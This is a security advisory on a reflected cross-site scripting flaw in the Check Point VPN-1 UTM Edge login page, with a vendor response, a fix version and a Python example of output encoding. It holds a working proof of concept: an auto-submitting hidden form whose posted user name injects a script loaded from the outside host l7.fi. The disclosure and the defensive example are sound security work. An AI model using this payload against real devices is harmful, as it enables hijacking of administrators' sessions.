[NEWS] Checkpoint VPN-1 UTM Edge Cross Site Scripting



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Checkpoint VPN-1 UTM Edge Cross Site Scripting
------------------------------------------------------------------------


SUMMARY

<http://www.checkpoint.com/> VPN-1 UTM Edge appliances "deliver unified
threat management to enterprises with branch offices and simplify security
deployments and manageability. VPN-1 UTM Edge appliances consolidate
proven enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the branch
office as your weakest link. As part of Check Point's Unified Security
Architecture, VPN-1 UTM Edge can enforce a global security policy and
allows administrators to manage and update thousands of appliances as
easily as managing one."

Insufficient input validation and output encoding on the login page allow
an attacker to perform HTML injection by posting a suitable string to the
login form handler. The injection results in reflected, pre-authentication
cross-site scripting.

DETAILS

Vulnerable Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.0.48x

Immune Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.5.48

Form-based authentication is used only when the device is accessed over
HTTP; over HTTPS the device uses HTTP Basic authentication instead, so the
vulnerable login form is only reachable over plain HTTP.

The device does not accept the parameters in a GET request; a POST request
has to be used instead. Exploiting the vulnerability therefore takes a bit
more effort than an ordinary GET-based reflected cross-site scripting bug:
the victim has to be made to send a POST, for example through an
auto-submitting form on an attacker-controlled page, as in the proof of
concept below.

The currently installed version can be checked at
http://xxx.xxx.xxx.xxx/pub/test.html, where xxx.xxx.xxx.xxx is the LAN IP
address of the device. The page also displays the current product key.

Vendor response:
"Once users register the appliance and connect to the service center
(Safe@Office appliances), the latest firmware is automatically downloaded
to their appliance. For UTM-1 Edge appliances, the latest firmware version
can be downloaded from the Check Point download center. Currently, this is
version 7.5.48 that does not contain the reported issue. We believe that
customers are not exposed to this issue."

Proof of Concept:
<html>
<body onload="document.f.submit()">
<!-- Hidden form, submitted automatically on page load. The login handler
     only accepts the parameters via POST, hence a form instead of a URL.
     192.168.10.1 stands for the appliance's LAN address. -->
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">

<!-- The posted user name is reflected into the login page without output
     encoding, so the script tag is rendered and loads JavaScript from l7.fi. -->
<input name="user" value="'<script/src=//l7.fi></script>">

</form>
</body>
</html>
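To make the root cause concrete, the following Python sketch is an added example written for this page; it is not code from the advisory, from Louhi Networks or from Check Point. It assumes a hypothetical login handler that echoes the attempted user name into the page body (the real appliance's markup and reflection context are not shown in the advisory), renders that page once without and once with output encoding, and includes the reflection check a tester would run over a captured response after posting the advisory's payload.

```python
import html

# Payload taken from the advisory's proof of concept (posted in the "user" field).
ADVISORY_PAYLOAD = "'<script/src=//l7.fi></script>"

# Hypothetical login page, constructed for this example: it echoes the
# attempted user name into the page body. The real appliance's markup and
# reflection context are not shown in the advisory.
PAGE = (
    "<html><body>"
    "<p>Login failed for user {user}</p>"
    '<form name="f" method="post" action="/">'
    '<input name="user"><input name="password" type="password">'
    "</form></body></html>"
)


def render_login_vulnerable(user: str) -> str:
    """Reflects the posted value verbatim: any markup in it becomes part of
    the page, which is the defect the advisory describes."""
    return PAGE.format(user=user)


def render_login_fixed(user: str) -> str:
    """Same page with HTML output encoding: <, >, & and both quote characters
    are turned into entities before the value is placed in the page."""
    return PAGE.format(user=html.escape(user, quote=True))


def classify_reflection(body: str, probe: str) -> str:
    """Check a captured response for a probe string that was sent in a request.

    Returns "raw" if the probe appears unchanged (its markup would be
    interpreted by a browser), "encoded" if it is present only in
    entity-encoded form (harmless), and "absent" if the response does not
    reflect it at all.
    """
    if probe in body:
        return "raw"
    if probe in html.unescape(body):
        return "encoded"
    return "absent"


if __name__ == "__main__":
    for label, render in (("vulnerable", render_login_vulnerable),
                          ("fixed", render_login_fixed)):
        body = render(ADVISORY_PAYLOAD)
        print(f"{label}: {classify_reflection(body, ADVISORY_PAYLOAD)}")
        print("  ", body)
```

classify_reflection is the check to apply to a response captured after posting a probe to the login handler; it separates the raw reflection reported in this advisory from a correctly encoded one, and the "absent" result tells the tester the field is not reflected on that page at all.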

Solution:
Update to version 7.5.48

Disclosure Timeline:
19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released


ADDITIONAL INFORMATION

The information has been provided by <mailto:henri.lindberg@xxxxxxxx>
Henri Lindberg.
The original article can be found at:
http://www.louhi.fi/advisory/checkpoint_080306.txt




DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


